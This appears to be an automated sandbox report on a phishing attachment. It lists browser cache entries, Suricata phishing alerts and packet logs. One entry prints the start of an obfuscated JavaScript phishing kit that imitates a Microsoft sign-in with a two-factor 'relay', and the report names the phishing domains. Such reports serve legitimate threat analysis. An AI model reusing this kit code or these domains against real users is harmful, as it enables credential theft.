MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Reputation:	low
URL:	https://i.imgur.com/KAb5SEy.png
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	20
Entropy (8bit):	3.346439344671015
Encrypted:	false
SSDEEP:	3:YMES3Y:YMESY
MD5:	7AB0BAE74FD327DA4786185272B6CD23
SHA1:	A28F0144ED10A95901ACD427C6652405E7017C65
SHA-256:	546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
SHA-512:	3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
Malicious:	false
Reputation:	low
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"161.77.13.2"}

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 57

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
URL:	https://i.imgur.com/0HdPsKK.png
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 58

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 59

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	68421
Entropy (8bit):	4.894475473551413
Encrypted:	false
SSDEEP:	768:POCTtTOT+Th9dO31GqjkKB6wI7JoHHy6BKJwhXBXoXRn2CVWpgnEDUgUoCn4CSaS:POC5yCDyB6F5/VW4Hllbe
MD5:	9C76AE7DEC155E62D2CCA6459DE39275
SHA1:	F230003441134EEA9895FA84DC919CE5374270E1
SHA-256:	6148C255F3F2BD0F3DB2370061E8A19C03CB116493288CF4F9ABAEC127D6B991
SHA-512:	00C3929B3281B8F0F6C6E30F38CC7727FE4D684F6FCC060FF89AF1871D61BDAF887B40155B30029EE9F01268E0C92C562DFECE8B025C35DD3832F7CC80BA25A9
Malicious:	false
URL:	https://office.avcbtech.store/gtk/xls/g1t2k.js?uid=ombudsman@ombudsman.gov.au
Preview:	function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.346439344671015
Encrypted:	false
SSDEEP:	3:YMES3Y:YMESY
MD5:	7AB0BAE74FD327DA4786185272B6CD23
SHA1:	A28F0144ED10A95901ACD427C6652405E7017C65
SHA-256:	546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
SHA-512:	3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
Malicious:	false
Preview:	{"ip":"161.77.13.2"}

Chrome Cache Entry: 61

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.879981511735152
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	ATT11027.xhtml
File size:	3'453 bytes
MD5:	7ba7d19f35d1cff9ebd3e95ed810b018
SHA1:	e978536e664a5ad264b610edaeea2792d34c23b3
SHA256:	6d4ac65666f98d02237b95cd6be43198b731655fe9cb3c4129f6c6d28be681ac
SHA512:	1ee48786b3f0ac83d2f5e2bd9cc12d3b65704d8fb152718aa4cd049ab0f08a9910597c34108f6ac843b761ad6711ab99291ebf5be3e65cb17bf9a727ad3da500
SSDEEP:	48:3VmIAqyIFwQ3zUttD2LB+a3mD24EAnki0w0eGWVYtxyllr2+Iw+mRdtk:VAmOO+aWD2DIHrQ
TLSH:	EF61325D58D588A0453686936B7BE72EEF5102273718C248BADCEB071FB3E11C4776D8
File Content Preview:	...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-

Static OLE Info

General

Document Type:	Text
Number of OLE Files:	1

OLE File "ATT11027.xhtml"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-20T23:53:38.986690+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	60857	104.168.138.190	443	TCP
2025-03-20T23:54:11.716628+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	60870	104.168.138.190	443	TCP
2025-03-20T23:54:20.163451+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	60882	104.168.138.190	443	TCP
2025-03-20T23:54:47.563743+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	60887	104.168.138.190	443	TCP

Network Port Distribution

Total Packets: 431
• 8105 undefined
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2025 23:52:45.975477934 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:45.975570917 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:45.975672007 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:45.976737022 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:45.976774931 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.431447029 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.431565046 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.433016062 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.433047056 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.435254097 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.435343981 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.437417030 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.437585115 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.437645912 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.437664032 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.437721014 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.437875986 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.438004971 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.438069105 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.438936949 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:46.438997030 CET	443	60821	52.182.143.213	192.168.2.24
Mar 20, 2025 23:52:46.439066887 CET	60821	443	192.168.2.24	52.182.143.213
Mar 20, 2025 23:52:54.759970903 CET	60832	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:52:54.760015965 CET	443	60832	142.251.35.164	192.168.2.24
Mar 20, 2025 23:52:54.760243893 CET	60832	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:52:54.760298967 CET	60832	443	192.168.2.24	142.251.35.164
Mar 20, 2025 23:52:54.760324001 CET	443	60832	142.251.35.164	192.168.2.24
Mar 20, 2025 23:52:54.966434956 CET	443	60832	142.251.35.164	192.168.2.24
